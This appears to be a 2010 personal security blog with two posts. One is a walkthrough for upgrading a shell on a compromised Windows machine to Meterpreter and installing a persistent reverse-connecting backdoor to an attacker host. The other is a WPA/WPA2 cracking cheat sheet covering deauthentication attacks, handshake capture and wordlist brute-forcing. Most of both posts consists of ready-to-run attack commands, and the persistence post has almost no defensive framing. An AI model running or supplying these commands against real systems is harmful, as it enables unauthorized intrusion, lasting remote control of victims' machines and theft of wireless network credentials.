Thursday, June 17, 2010

Upgrading from shell to meterpreter and then adding persistence

Say you compromised a box and installed a backdoor that provides you with shell acess. You connect to the backdoor listener and would like to do alot more than what the windows command prompt will allow you to do. Like most of us, we will want access to the meterpreter ("Google meterpreter if you don't have a clue what it is"). We can perform an upgrade on our regular shell to a meterpreter session using metasploit.

you can follow the examples on:
http://pauldotcom.com/2010/04/using-meterpreter-to-control-n.html

Just a quick summary.
After you connect to the listener on victim machine:
[ctrl z] to background the session
# setg LHOST ip_addr //this the ip of machine of the attacker with metasploit
# setg LPORT port_num //set port num to use for the upgraded session
# session -u 1 //where one is the session number of the regular shell session

IMPORTANT:
I've only gotten this working when the victim machine had the backdoor or service waiting for shell connections, meaning that when i compromised the box, i used a bind_shell payload or the victim had some kind of listener that would give you shell access when connected like netcat. I could not get this working when using a reverse_tcp shell payload initially.


When you have a meterpreter session, to add a persistent reverse connecting meterpreter client you can use the "persistence" script with options as follows:

meterpreter> run persistence -A -i 5 -p 4444 -r 192.168.1.53

'-A' : Automatically starts a mtaching multi/handler to connect listen for incoming connections
'-i' : Interval in seconds between each connection attempt
'-p' : port on the remote host where metasploit is listening
'-r' :IP of the system running the metasploit listener

if you opted to not use the '-A' option, you can always start up the multi/handler manually

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lport=4444 lhost=192.168.1.53 E

I've had one instance where when i got the reverse meterpreter session connected then disconnected, it refused to automatically connect again. I really had no answer for that problem at the time but what worked for me is that i had to migrate to a process with system priveledges (like explorer.exe) then disconnect. The script then was continually sending its reversing connections as it should back to my metasploit box.

Resources / Good Reading:
http://www.darkoperator.com/
http://pauldotcom.com/2010/04/using-meterpreter-to-control-n.html

Tuesday, June 1, 2010

WPA/WPA2 PSK cracking quick reference

There are too many guides and resources out there to doing this stuff so i wont be giving much explanation and theory on WPA hacking. Remember, this should only be performed on networks that you have permission to audit the security of. This here will serve as a quick and dirty cheatsheet of commands necessary to potentially audit the strength/weakness of your wireless networks using the aircrack-ng or cowpatty to bruteforce the password using a wordlist.

# airmon-ng start wlan0
// put interface in monitor mode

# airodump-ng mon0 // scan air for targets

# airodump-ng --channel 1 --bssid "AP_MAC_addr" -w wpa.cap mon0 //filter capture packets from a specific AP's MAC address and channel

#aireplay-ng --deauth 5 -a "AP_MAC_addr" -c "Client_MAC_addr" mon0 //Perform a deauthentication attack on a client to force reassociation in hope of capturing WPA handshake

When Handshake is captured

using cowpatty:
# cowpatty -f passwords.lst -r wpa.cap -s "essid_of_network" //attempt to bruteforce the password using wordlist

using aircrack-ng:
# aircrack-ng -w passwords.lst -e "essid_of_network" wpa.cap //attempt to bruteforce the password using wordlist